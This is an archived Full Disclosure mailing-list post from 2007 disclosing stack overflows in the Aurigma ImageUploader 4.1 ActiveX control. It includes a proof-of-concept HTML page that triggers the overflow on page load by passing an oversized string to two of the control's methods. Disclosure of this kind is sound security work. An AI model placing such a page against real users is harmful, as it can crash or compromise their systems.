Full Disclosure mailing list archives
Aurigma ImageUploader 4.1 Multiple stack overflows
From: Elazar Broad <elazarb () earthlink net>
Date: Wed, 21 Nov 2007 21:55:32 -0500 (GMT-05:00)
There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was installed by www.dotphoto.com. PoC as follows: ----------------------- <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = "AAAA"; while (s.length < 999999) s=s+s; var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7} obj.GotoFolder(s); obj.CanGotoFolder(s); } </script> </head> <body onload="JavaScript: return Check();"> </body> </html> ----------------------- Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Aurigma ImageUploader 4.1 Multiple stack overflows Elazar Broad (Nov 22)